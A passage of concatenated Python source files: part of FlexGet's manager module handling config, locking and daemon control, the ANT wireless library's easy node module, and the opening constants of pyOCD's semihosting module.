log_file, self.options.loglevel, to_file=to_file, to_console=not self.options.cron
)
def initialize(self) -> None:
"""
Load plugins, database, and config. Also initializes (but does not start) the task queue and ipc server.
This should only be called after obtaining a lock.
"""
if self.initialized:
raise RuntimeError('Cannot call initialize on an already initialized manager.')
plugin.load_plugins(
extra_plugins=[os.path.join(self.config_base, 'plugins')],
extra_components=[os.path.join(self.config_base, 'components')],
)
# Reparse CLI options now that plugins are loaded
self.options = get_parser().parse_args(self.args)
self.task_queue = TaskQueue()
self.ipc_server = IPCServer(self, self.options.ipc_port)
self.setup_yaml()
self.init_sqlalchemy()
fire_event('manager.initialize', self)
try:
self.load_config()
except ValueError as e:
logger.critical('Failed to load config file: {}', e.args[0])
raise
# cannot be imported at module level because of circular references
from flexget.utils.simple_persistence import SimplePersistence
self.persist = SimplePersistence('manager')
if db_schema.upgrade_required():
logger.info('Database upgrade is required. Attempting now.')
fire_event('manager.upgrade', self)
if manager.db_upgraded:
fire_event('manager.db_upgraded', self)
fire_event('manager.startup', self)
self.initialized = True
@property
def tasks(self) -> List[str]:
"""A list of tasks in the config"""
if not self.config:
return []
return list(self.config.get('tasks', {}).keys())
@property
def has_lock(self) -> bool:
return self._has_lock
def execute(
self,
options: Union[dict, argparse.Namespace] = None,
priority: int = 1,
suppress_warnings: Sequence[str] = None,
) -> List[Tuple[str, str, threading.Event]]:
"""
Run all (can be limited with options) tasks from the config.
:param options: Either an :class:`argparse.Namespace` instance, or a dict, containing options for execution
:param priority: If there are other executions waiting to be run, they will be run in priority order,
lowest first.
:param suppress_warnings: Allows suppressing log warning about missing plugin in key phases
:returns: a list of :class:`threading.Event` instances which will be
set when each respective task has finished running
"""
if options is None:
options = copy.copy(self.options.execute)
elif isinstance(options, dict):
options_namespace = copy.copy(self.options.execute)
options_namespace.__dict__.update(options)
options = options_namespace
task_names = self.tasks
# Only reload config if daemon
config_hash = self.hash_config()
if self.is_daemon and self.autoreload_config and self.config_file_hash != config_hash:
logger.info('Config change detected. Reloading.')
try:
self.load_config(output_to_console=False, config_file_hash=config_hash)
logger.info('Config successfully reloaded!')
except Exception as e:
logger.error('Reloading config failed: {}', e)
# Handle --tasks
if options.tasks:
# Consider * the same as not specifying tasks at all (makes sure manual plugin still works)
if options.tasks == ['*']:
options.tasks = None
else:
# Create list of tasks to run, preserving order
task_names = []
for arg in options.tasks:
matches = [
t for t in self.tasks if fnmatch.fnmatchcase(str(t).lower(), arg.lower())
]
if not matches:
msg = f'`{arg}` does not match any tasks'
logger.error(msg)
continue
task_names.extend(m for m in matches if m not in task_names)
# Set the option as a list of matching task names so plugins can use it easily
options.tasks = task_names
# TODO: 1.2 This is a hack to make task priorities work still, not sure if it's the best one
task_names = sorted(
task_names, key=lambda t: self.config['tasks'][t].get('priority', 65535)
)
finished_events = []
for task_name in task_names:
task = Task(
self,
task_name,
options=options,
output=get_console_output(),
session_id=flexget.log.get_log_session_id(),
priority=priority,
suppress_warnings=suppress_warnings,
)
self.task_queue.put(task)
finished_events.append((task.id, task.name, task.finished_event))
return finished_events
def start(self) -> None:
"""
Starting point when executing from commandline, dispatch execution to correct destination.
If there is a FlexGet process with an ipc server already running, the command will be sent there for execution
and results will be streamed back.
If not, this will attempt to obtain a lock, initialize the manager, and run the command here.
"""
# When we are in test mode, we use a different lock file and db
if self.options.test:
self.lockfile = os.path.join(self.config_base, '.test-%s-lock' % self.config_name)
# If another process is started, send the execution to the running process
ipc_info = self.check_ipc_info()
# If we are connecting to a running daemon, we don't want to log to the log file,
# the daemon is already handling that.
self._init_logging(to_file=not ipc_info)
if ipc_info:
console(
'There is a FlexGet process already running for this config, sending execution there.'
)
logger.debug('Sending command to running FlexGet process: {}', self.args)
try:
client = IPCClient(ipc_info['port'], ipc_info['password'])
except ValueError as e:
logger.error(e)
else:
try:
client.handle_cli(self.args)
except KeyboardInterrupt:
logger.error(
'Disconnecting from daemon due to ctrl-c. Executions will still continue in the '
'background.'
)
except EOFError:
logger.error('Connection from daemon was severed.')
return
if self.options.test:
logger.info('Test mode, creating a copy from database ...')
db_test_filename = os.path.join(self.config_base, 'test-%s.sqlite' % self.config_name)
if os.path.exists(self.db_filename):
shutil.copy(self.db_filename, db_test_filename)
logger.info('Test database created')
self.db_filename = db_test_filename
# No running process, we start our own to handle command
with self.acquire_lock():
self.initialize()
self.handle_cli()
self._shutdown()
def handle_cli(self, options: argparse.Namespace = None) -> None:
"""
Dispatch a cli command to the appropriate function.
* :meth:`.execute_command`
* :meth:`.daemon_command`
* CLI plugin callback function
The manager should have a lock and be initialized before calling this method.
:param options: argparse options for command. Defaults to options that manager was instantiated with.
"""
if not options:
options = self.options
command = options.cli_command
if command is None:
raise Exception('Command missing')
command_options = getattr(options, command)
# First check for built-in commands
if command in ['execute', 'daemon']:
if command == 'execute':
self.execute_command(command_options)
elif command == 'daemon':
self.daemon_command(command_options)
else:
# Otherwise dispatch the command to the callback function
options.cli_command_callback(self, command_options)
def execute_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'execute' CLI command.
If there is already a task queue running in this process, adds the execution to the queue.
If FlexGet is being invoked with this command, starts up a task queue and runs the execution.
Fires events:
* manager.execute.started
* manager.execute.completed
:param options: argparse options
"""
fire_event('manager.execute.started', self, options)
if self.task_queue.is_alive() or self.is_daemon:
if not self.task_queue.is_alive():
logger.error(
'Task queue has died unexpectedly. Restarting it. Please open an issue on Github and include'
' any previous error logs.'
)
self.task_queue = TaskQueue()
self.task_queue.start()
if len(self.task_queue):
logger.verbose('There is a task already running, execution queued.')
finished_events = self.execute(options)
if not options.cron:
# Wait until execution of all tasks has finished
for _, _, event in finished_events:
event.wait()
else:
self.task_queue.start()
self.ipc_server.start()
self.execute(options)
self.shutdown(finish_queue=True)
self.task_queue.wait()
fire_event('manager.execute.completed', self, options)
def daemon_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'daemon' CLI command.
Fires events:
* manager.daemon.started
* manager.daemon.completed
:param options: argparse options
"""
# Import API so it can register to daemon.started event
if options.action == 'start':
if self.is_daemon:
logger.error('Daemon already running for this config.')
return
elif self.task_queue.is_alive():
logger.error(
'Non-daemon execution of FlexGet is running. Cannot start daemon until it is finished.'
)
return
if options.daemonize:
self.daemonize()
if options.autoreload_config:
self.autoreload_config = True
try:
signal.signal(signal.SIGTERM, self._handle_sigterm)
except ValueError as e:
# If flexget is being called from another script, e.g. windows service helper, and we are not the
# main thread, this error will occur.
logger.debug('Error registering sigterm handler: {}', e)
self.is_daemon = True
def run_daemon(tray_icon: 'TrayIcon' = None):
fire_event('manager.daemon.started', self)
self.task_queue.start()
self.ipc_server.start()
self.task_queue.wait()
fire_event('manager.daemon.completed', self)
if tray_icon:
tray_icon.stop()
if options.tray_icon:
from flexget.tray_icon import tray_icon # noqa
self._add_tray_icon_items(tray_icon)
# Tray icon must be run in the main thread.
m = threading.Thread(target=run_daemon, args=(tray_icon,))
m.start()
tray_icon.run()
m.join()
else:
run_daemon()
elif options.action in ['stop', 'reload-config', 'status']:
if not self.is_daemon:
logger.error('There does not appear to be a daemon running.')
return
if options.action == 'status':
logger.info('Daemon running. (PID: {})', os.getpid())
elif options.action == 'stop':
tasks = (
'all queued tasks (if any) have'
if options.wait
else 'currently running task (if any) has'
)
logger.info(
'Daemon shutdown requested. Shutdown will commence when {} finished executing.',
tasks,
)
self.shutdown(options.wait)
elif options.action == 'reload-config':
logger.info('Reloading config from disk.')
try:
self.load_config()
except ValueError as e:
logger.error('Error loading config: {}', e.args[0])
else:
logger.info('Config successfully reloaded from disk.')
def _handle_sigterm(self, signum, frame) -> None:
logger.info('Got SIGTERM. Shutting down.')
self.shutdown(finish_queue=False)
def setup_yaml(self) -> None:
"""Sets up the yaml loader to return unicode objects for strings by default"""
def construct_yaml_str(self, node):
# Override the default string handling function
# to always return unicode objects
return self.construct_scalar(node)
yaml.Loader.add_constructor('tag:yaml.org,2002:str', construct_yaml_str)
yaml.SafeLoader.add_constructor('tag:yaml.org,2002:str', construct_yaml_str)
# Set up the dumper to not tag every string with !!python/unicode
def unicode_representer(dumper, uni):
node = yaml.ScalarNode(tag='tag:yaml.org,2002:str', value=uni)
return node
yaml.add_representer(str, unicode_representer)
# Set up the dumper to increase the indent for lists
def increase_indent_wrapper(func):
def increase_indent(self, flow=False, indentless=False):
func(self, flow, False)
return increase_indent
yaml.Dumper.increase_indent = increase_indent_wrapper(yaml.Dumper.increase_indent)
yaml.SafeDumper.increase_indent = increase_indent_wrapper(yaml.SafeDumper.increase_indent)
def _init_config(self, create: bool = False) -> None:
"""
Find and load the configuration file.
:param bool create: If a config file is not found, and create is True, one will be created in the home folder
:raises: `OSError` when no config file could be found, and `create` is False.
"""
home_path = os.path.join(os.path.expanduser('~'), '.flexget')
options_config = os.path.expanduser(self.options.config)
possible = []
if os.path.isabs(options_config):
# explicit path given, don't try anything
config = options_config
possible = [config]
else:
logger.debug('Figuring out config load paths')
try:
possible.append(os.getcwd())
except OSError:
logger.debug('current directory invalid, not searching for config there')
# for virtualenv / dev sandbox
if hasattr(sys, 'real_prefix'):
logger.debug('Adding virtualenv path')
possible.append(sys.prefix)
# normal lookup locations
possible.append(home_path)
if sys.platform.startswith('win'):
# On windows look in ~/flexget as well, as explorer does not let you create a folder starting with a dot
home_path = os.path.join(os.path.expanduser('~'), 'flexget')
possible.append(home_path)
else:
# The freedesktop.org standard config location
xdg_config = os.environ.get(
'XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config')
)
possible.append(os.path.join(xdg_config, 'flexget'))
for path in possible:
config = os.path.join(path, options_config)
if os.path.exists(config):
logger.debug('Found config: {}', config)
break
else:
config = None
if create and not (config and os.path.exists(config)):
config = os.path.join(home_path, options_config)
logger.info('Config file {} not found. Creating new config {}', options_config, config)
with open(config, 'w') as newconfig:
# Write empty tasks to the config
newconfig.write(yaml.dump({'tasks': {}}))
elif not config:
logger.critical('Failed to find configuration file {}', options_config)
logger.info('Tried to read from: {}', ', '.join(possible))
raise OSError('No configuration file found.')
if not os.path.isfile(config):
raise OSError('Config `%s` does not appear to be a file.' % config)
logger.debug('Config file {} selected', config)
self.config_path = config
self.config_name = os.path.splitext(os.path.basename(config))[0]
self.config_base = os.path.normpath(os.path.dirname(config))
self.lockfile = os.path.join(self.config_base, '.%s-lock' % self.config_name)
self.db_filename = os.path.join(self.config_base, 'db-%s.sqlite' % self.config_name)
def hash_config(self) -> Optional[str]:
if not self.config_path:
return None
sha1_hash = hashlib.sha1()
with open(self.config_path, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
sha1_hash.update(data)
return sha1_hash.hexdigest()
def load_config(
self, output_to_console: bool = True, config_file_hash: str = None
) -> None:
"""
Loads the config file from disk, validates and activates it.
:raises: `ValueError` if there is a problem loading the config file
"""
fire_event('manager.before_config_load', self)
with open(self.config_path, 'r', encoding='utf-8') as f:
try:
raw_config = f.read()
except UnicodeDecodeError:
logger.critical('Config file must be UTF-8 encoded.')
raise ValueError('Config file is not UTF-8 encoded')
try:
self.config_file_hash = config_file_hash or self.hash_config()
config = yaml.safe_load(raw_config) or {}
except yaml.YAMLError as e:
msg = str(e).replace('\n', ' ')
msg = ' '.join(msg.split())
logger.critical(msg)
if output_to_console:
print('')
print('-' * 79)
print(' Malformed configuration file (check messages above). Common reasons:')
print('-' * 79)
print('')
print(' o Indentation error')
print(' o Missing : from end of the line')
print(' o Non ASCII characters (use UTF8)')
print(
' o If text contains any of :[]{}% characters it must be single-quoted '
'(eg. value{1} should be \'value{1}\')\n'
)
# Not very good practice but we get several kind of exceptions here, I'm not even sure all of them
# At least: ReaderError, YmlScannerError (or something like that)
if isinstance(e, yaml.MarkedYAMLError):
lines = 0
if e.problem is not None:
print(' Reason: %s\n' % e.problem)
if e.problem == 'mapping values are not allowed here':
print(' ----> MOST LIKELY REASON: Missing : from end of the line!')
print('')
if e.context_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.context_mark.line, e.context_mark.column)
)
lines += 1
if e.problem_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.problem_mark.line, e.problem_mark.column)
)
lines += 1
if lines:
print('')
if lines == 1:
print(' Fault is almost always in this or previous line\n')
if lines == 2:
print(' Fault is almost always in one of these lines or previous ones\n')
# When --debug escalate to full stacktrace
if self.options.debug or not output_to_console:
raise
raise ValueError('Config file is not valid YAML')
# config loaded successfully
logger.debug('config_name: {}', self.config_name)
logger.debug('config_base: {}', self.config_base)
# Install the newly loaded config
self.update_config(config)
def update_config(self, config: dict) -> None:
"""
Provide a new config for the manager to use.
:raises: `ValueError` and rolls back to previous config if the provided config is not valid.
"""
new_user_config = config
old_config = self.config
try:
self.config = self.validate_config(config)
except ValueError as e:
for error in getattr(e, 'errors', []):
logger.critical('[{}] {}', error.json_pointer, error.message)
logger.debug('invalid config, rolling back')
self.config = old_config
raise
logger.debug('New config data loaded.')
self.user_config = copy.deepcopy(new_user_config)
fire_event('manager.config_updated', self)
def backup_config(self) -> str:
backup_path = os.path.join(
self.config_base,
'%s-%s.bak' % (self.config_name, datetime.now().strftime('%y%m%d%H%M%S')),
)
logger.debug('backing up old config to {} before new save', backup_path)
try:
shutil.copy(self.config_path, backup_path)
except OSError as e:
logger.warning('Config backup creation failed: {}', str(e))
raise
return backup_path
def save_config(self) -> None:
"""Dumps current config to yaml config file"""
# TODO: Only keep x number of backups..
# Back up the user's current config before overwriting
try:
self.backup_config()
except OSError:
return
with open(self.config_path, 'w') as config_file:
config_file.write(yaml.dump(self.user_config, default_flow_style=False))
def config_changed(self) -> None:
"""Makes sure that all tasks will have the config_modified flag come out true on the next run.
Useful when changing the db and all tasks need to be completely reprocessed."""
from flexget.task import config_changed
config_changed()
fire_event('manager.config_updated', self)
def validate_config(self, config: dict = None) -> dict:
"""
Check all root level keywords are valid. Config may be modified by before_config_validate hooks. Modified
config will be returned.
:param config: Config to check. If not provided, current manager config will be checked.
:raises: `ValueError` when config fails validation. There will be an `errors` attribute with the schema errors.
:returns: Final validated config.
"""
conf = config if config else self.config
conf = fire_event('manager.before_config_validate', conf, self)
errors = config_schema.process_config(conf)
if errors:
err = ValueError('Did not pass schema validation.')
err.errors = errors
raise err
else:
return conf
def init_sqlalchemy(self) -> None:
"""Initialize SQLAlchemy"""
try:
if [int(part) for part in sqlalchemy.__version__.split('.')] < [0, 7, 0]:
print(
'FATAL: SQLAlchemy 0.7.0 or newer required. Please upgrade your SQLAlchemy.',
file=sys.stderr,
)
sys.exit(1)
except ValueError:
logger.critical('Failed to check SQLAlchemy version, you may need to upgrade it')
# SQLAlchemy
if self.database_uri is None:
# in case running on windows, needs double \\
filename = self.db_filename.replace('\\', '\\\\')
self.database_uri = f'sqlite:///{filename}'
if self.db_filename and not os.path.exists(self.db_filename):
logger.verbose('Creating new database {} - DO NOT INTERRUPT ...', self.db_filename)
# fire up the engine
logger.debug('Connecting to: {}', self.database_uri)
try:
self.engine = sqlalchemy.create_engine(
self.database_uri,
echo=self.options.debug_sql,
connect_args={'check_same_thread': False, 'timeout': 10},
)
except ImportError as e:
print(
'FATAL: Unable to use SQLite. Are you running Python 2.7, 3.3 or newer ?\n'
'Python should normally have SQLite support built in.\n'
'If you\'re running correct version of Python then it is not equipped with SQLite.\n'
'You can try installing `pysqlite`. If you have compiled python yourself, '
'recompile it with SQLite support.\n'
'Error: %s' % e,
file=sys.stderr,
)
sys.exit(1)
Session.configure(bind=self.engine)
# create all tables, doesn't do anything to existing tables
try:
Base.metadata.create_all(bind=self.engine)
except OperationalError as e:
if os.path.exists(self.db_filename):
print(
'%s - make sure you have write permissions to file %s'
% (e.message, self.db_filename),
file=sys.stderr,
)
else:
print(
'%s - make sure you have write permissions to directory %s'
% (e.message, self.config_base),
file=sys.stderr,
)
raise
def _read_lock(self) -> Optional[dict]:
"""
Read the values from the lock file. Returns None if there is no current lock file.
"""
if self.lockfile and os.path.exists(self.lockfile):
result: Dict[str, Union[str, int]] = {}
with open(self.lockfile, encoding='utf-8') as f:
lines = [line for line in f.readlines() if line]
for line in lines:
try:
key, value = line.split(':', 1)
except ValueError:
logger.debug('Invalid line in lock file: {}', line)
continue
result[key.strip().lower()] = value.strip()
for key in result:
if result[key].isdigit():
result[key] = int(result[key])
result.setdefault('pid', None)
if not result['pid']:
logger.error(
'Invalid lock file. Make sure FlexGet is not running, then delete it.'
)
elif not pid_exists(result['pid']):
return None
return result
return None
def check_lock(self) -> bool:
"""Returns True if there is a lock on the database."""
lock_info = self._read_lock()
if not lock_info:
return False
# Don't count it if we hold the lock
if os.getpid() == lock_info['pid']:
return False
return True
def check_ipc_info(self) -> Optional[dict]:
"""If a daemon has a lock on the database, return info to connect to IPC."""
lock_info = self._read_lock()
if lock_info and 'port' in lock_info:
return lock_info
return None
@contextmanager
def acquire_lock(self, event: bool = True) -> Iterator:
"""
:param bool event: If True, the 'manager.lock_acquired' event will be fired after a lock is obtained
"""
acquired = False
try:
# Don't do anything if we already have a lock. This means only the outermost call will release the lock file
if not self._has_lock:
# Exit if there is an existing lock.
if self.check_lock():
with open(self.lockfile, encoding='utf-8') as f:
pid = f.read()
print(
'Another process (%s) is running, will exit.' % pid.split('\n')[0],
file=sys.stderr,
)
print(
'If you\'re sure there is no other instance running, delete %s'
% self.lockfile,
file=sys.stderr,
)
sys.exit(1)
self._has_lock = True
self.write_lock()
acquired = True
if event:
fire_event('manager.lock_acquired', self)
yield
finally:
if acquired:
self.release_lock()
self._has_lock = False
def write_lock(self, ipc_info: dict = None) -> None:
assert self._has_lock
with open(self.lockfile, 'w', encoding='utf-8') as f:
f.write('PID: %s\n' % os.getpid())
if ipc_info:
for key in sorted(ipc_info):
f.write('%s: %s\n' % (key, ipc_info[key]))
def release_lock(self) -> None:
try:
os.remove(self.lockfile)
except OSError as e:
if e.errno != errno.ENOENT:
raise
logger.debug('Lockfile {} not found', self.lockfile)
else:
logger.debug('Removed {}', self.lockfile)
def daemonize(self) -> None:
"""Daemonizes the current process. Returns the new pid"""
if sys.platform.startswith('win'):
logger.error('Cannot daemonize on windows')
return
if threading.active_count() != 1:
logger.critical(
'There are {!r} active threads. Daemonizing now may cause strange failures.',
threading.enumerate(),
)
logger.info('Daemonizing...')
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit first parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit from second parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
logger.info('Daemonize complete. New PID: {}', os.getpid())
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'ab+')
se = open(os.devnull, 'ab+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# If we have a lock, update the lock file with our new pid
if self._has_lock:
self.write_lock()
def db_cleanup(self, force: bool = False) -> None:
"""
Perform database cleanup if cleanup interval has been met.
Fires events:
* manager.db_cleanup
If interval was met. Gives session to do the cleanup as a parameter.
:param bool force: Run the cleanup no matter whether the interval has been met.
"""
expired = (
self.persist.get('last_cleanup', datetime(1900, 1, 1))
< datetime.now() - DB_CLEANUP_INTERVAL
)
if force or expired:
logger.info('Running database cleanup.')
with Session() as session:
fire_event('manager.db_cleanup', self, session)
# Try to VACUUM after cleanup
fire_event('manager.db_vacuum', self)
# Just in case some plugin was overzealous in its cleaning, mark the config changed
self.config_changed()
self.persist['last_cleanup'] = datetime.now()
else:
logger.debug('Not running db cleanup, last run {}', self.persist.get('last_cleanup'))
def shutdown(self, finish_queue: bool = True) -> None:
"""
Request manager shutdown.
:param bool finish_queue: Should scheduler finish the task queue
"""
if not self.initialized:
raise RuntimeError('Cannot shutdown manager that was never initialized.')
fire_event('manager.shutdown_requested', self)
self.task_queue.shutdown(finish_queue)
def _shutdown(self) -> None:
"""Runs when the manager is done processing everything."""
if self.ipc_server:
self.ipc_server.shutdown()
fire_event('manager.shutdown', self)
if not self.unit_test: # don't scroll "nosetests" summary results when logging is enabled
logger.debug('Shutting down')
self.engine.dispose()
# remove temporary database used in test mode
if self.options.test:
if 'test' not in self.db_filename:
raise Exception('trying to delete non test database?')
if self._has_lock:
os.remove(self.db_filename)
logger.info('Removed test database')
global manager
manager = None
def crash_report(self) -> str:
"""
This should be called when handling an unexpected exception. Will create a new log file containing the last 50
debug messages as well as the crash traceback.
"""
if not self.unit_test:
log_dir = os.path.dirname(self.log_filename)
filename = os.path.join(
log_dir, datetime.now().strftime('crash_report.%Y.%m.%d.%H%M%S%f.log')
)
with codecs.open(filename, 'w', encoding='utf-8') as outfile:
outfile.writelines(flexget.log.debug_buffer)
traceback.print_exc(file=outfile)
logger.critical(
'An unexpected crash has occurred. Writing crash report to {}. '
'Please verify you are running the latest version of flexget by using "flexget -V" '
'from CLI or by using version_checker plugin'
' at http://flexget.com/wiki/Plugins/version_checker. '
'You are currently using version {}',
filename,
get_current_flexget_version(),
)
logger.opt(exception=True).debug('Traceback:')
return traceback.format_exc()
|
node.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node:
def __init__(self):
self._responses_cond = threading.Condition()
self._responses = collections.deque()
self._event_cond = threading.Condition()
self._events = collections.deque()
self._main_thread = None
self._datas = queue.Queue()
self.ant = Ant()
self._running = True
self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
self._worker_thread.start()
self.capabilities = self.get_capabilities()
self.channels = [None]*self.capabilities["max_channels"]
def new_channel(self, ctype, network_number=0x00, ext_assign=None):
for i in range(len(self.channels)):
if self.channels[i] is None:
channel = Channel(i, self, self.ant)
self.channels[i] = channel
channel._assign(ctype, network_number, ext_assign)
return channel
_logger.debug("No free channel available")
return None
def remove_channel(self, channel_id):
for i in range(len(self.channels)):
try:
if self.channels[i].id == channel_id:
self.channels[i].close()
self.channels[i]._unassign()
self.channels[i] = None
except:
pass
def get_capabilities(self):
data = self.request_message(Message.ID.RESPONSE_CAPABILITIES)
if data[1] == Message.ID.RESPONSE_CAPABILITIES:
#The Standard Options bit field is encoded as follows:
# Bit 0 - CAPABILITIES_NO_RECEIVE_CHANNELS
# Bit 1 - CAPABILITIES_NO_TRANSMIT_CHANNELS
# Bit 2 - CAPABILITIES_NO_RECEIVE_MESSAGES
# Bit 3 - CAPABILITIES_NO_TRANSMIT_MESSAGES
# Bit 4 - CAPABILITIES_NO_ACKD_MESSAGES
# Bit 5 - CAPABILITIES_NO_BURST_MESSAGES
# Other bits are reserved
#The Advanced Options bit field is encoded as follows:
# Bit 1 - CAPABILITIES_NETWORK_ENABLED
# Bit 3 - CAPABILITIES_SERIAL_NUMBER_ENABLED
# Bit 4 - CAPABILITIES_PER_CHANNEL_TX_POWER_ENABLED
# Bit 5 - CAPABILITIES_LOW_PRIORITY_SEARCH_ENABLED
# Bit 6 - CAPABILITIES_SCRIPT_ENABLED
# Bit 7 - CAPABILITIES_SEARCH_LIST_ENABLED
# Other bits are reserved
#The Advanced Options 2 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_LED_ENABLED
# Bit 1 - CAPABILITIES_EXT_MESSAGE_ENABLED
# Bit 2 - CAPABILITIES_SCAN_MODE_ENABLED
# Bit 3 - Reserved
# Bit 4 - CAPABILITIES_PROX_SEARCH_ENABLED
# Bit 5 - CAPABILITIES_EXT_ASSIGN_ENABLED
# Bit 6 - CAPABILITIES_FS_ANTFS_ENABLED
# Bit 7 - CAPABILITIES_FIT1_ENABLED
# Other bits are reserved
#The Advanced Options 3 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_ADVANCED_BURST_ENABLED
# Bit 1 - CAPABILITIES_EVENT_BUFFERING_ENABLED
# Bit 2 - CAPABILITIES_EVENT_FILTERING_ENABLED
# Bit 3 - CAPABILITIES_HIGH_DUTY_SEARCH_ENABLED
# Bit 4 - CAPABILITIES_SEARCH_SHARING_ENABLED
# Bit 5 - Reserved.
# Bit 6 - CAPABILITIES_SELECTIVE_DATA_UPDATES_ENABLED
# Bit 7 - CAPABILITIES_ENCRYPTED_CHANNEL_ENABLED
#The Advanced Options 4 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_RFACTIVE_NOTIFICATION_ENABLED
# Other bits are reserved
result = {
"max_channels" : data[2][0],
"max_networks" : data[2][1],
"standard_options" : data[2][2],
"advanced_options" : data[2][3],
"advanced_options2" : data[2][4],
"max_sensrcore_channels": data[2][5],
}
if len(data[2])>=7:
result["advanced_options3"] = data[2][6]
if len(data[2])>=8:
result["advanced_options4"] = data[2][7]
return result
else:
_logger.debug(
"capabilities requested and not received (message id 0x{:02x} , but should be 0x{:02x})".format(data[2][4],Message.ID.RESPONSE_CAPABILITIES))
return
def request_message(self, messageId):
_logger.debug("requesting message %#02x", messageId)
self.ant.request_message(0, messageId)
_logger.debug("done requesting message %#02x", messageId)
return self.wait_for_special(messageId)
def set_network_key(self, network, key):
self.ant.set_network_key(network, key)
return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
def wait_for_event(self, ok_codes):
return wait_for_event(ok_codes, self._events, self._event_cond)
def wait_for_response(self, event_id):
return wait_for_response(event_id, self._responses, self._responses_cond)
def wait_for_special(self, event_id):
return wait_for_special(event_id, self._responses, self._responses_cond)
def _worker_response(self, channel, event, data):
self._responses_cond.acquire()
self._responses.append((channel, event, data))
self._responses_cond.notify()
self._responses_cond.release()
def _worker_event(self, channel, event, data):
if event == Message.Code.EVENT_RX_BURST_PACKET:
self._datas.put(("burst", channel, data))
elif event == Message.Code.EVENT_RX_BROADCAST:
self._datas.put(("broadcast", channel, data))
elif event == Message.Code.EVENT_TX:
self._datas.put(("broadcast_tx", channel, data))
elif event == Message.Code.EVENT_RX_ACKNOWLEDGED:
self._datas.put(("acknowledge", channel, data))
else:
self._event_cond.acquire()
self._events.append((channel, event, data))
self._event_cond.notify()
self._event_cond.release()
def _worker(self):
self.ant.response_function = self._worker_response
self.ant.channel_event_function = self._worker_event
# TODO: check capabilities
self.ant.start()
def _main(self):
while self._running:
try:
(data_type, channel, data) = self._datas.get(True, 1.0)
self._datas.task_done()
if data_type == "broadcast":
self.channels[channel].on_broadcast_data(data)
elif data_type == "burst":
self.channels[channel].on_burst_data(data)
elif data_type == "broadcast_tx":
self.channels[channel].on_broadcast_tx_data(data)
elif data_type == "acknowledge":
self.channels[channel].on_acknowledge_data(data)
else:
_logger.warning("Unknown data type '%s': %r", data_type, data)
except queue.Empty as e:
pass
def start(self):
self._main_thread = threading.Thread(target=self._main, name="_main")
self._main_thread.start()
def stop(self):
if self._running:
_logger.debug("Stoping ant.easy")
self._running = False
self.ant.stop()
self._worker_thread.join()
self._main_thread.join()
self._main_thread = None
|
semihost.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
import io
import logging
import time
import datetime
import threading
import socket
import traceback
import pyOCD
from ..gdbserver.gdb_socket import GDBSocket
from ..gdbserver.gdb_websocket import GDBWebSocket
from pyOCD.pyDAPAccess import DAPAccess
# Debug logging options
LOG_SEMIHOST = True
## bkpt #0xab instruction
BKPT_INSTR = 0xbeab
# ARM semihosting request numbers.
TARGET_SYS_OPEN = 0x01
TARGET_SYS_CLOSE = 0x02
TARGET_SYS_WRITEC = 0x03
TARGET_SYS_WRITE0 = 0x04
TARGET_SYS_WRITE = 0x05
TARGET_SYS_READ = 0x06
TARGET_SYS_READC = 0x07
TARGET_SYS_ISERROR = 0x08
TARGET_SYS_ISTTY = 0x09
TARGET_SYS_SEEK = 0x0a
TARGET_SYS_FLEN = 0x0c
TARGET_SYS_TMPNAM = 0x0d
TARGET_SYS_REMOVE = 0x0e
TARGET_SYS_RENAME = 0x0f
TARGET_SYS_CLOCK = 0x10
TARGET_SYS_TIME = 0x11
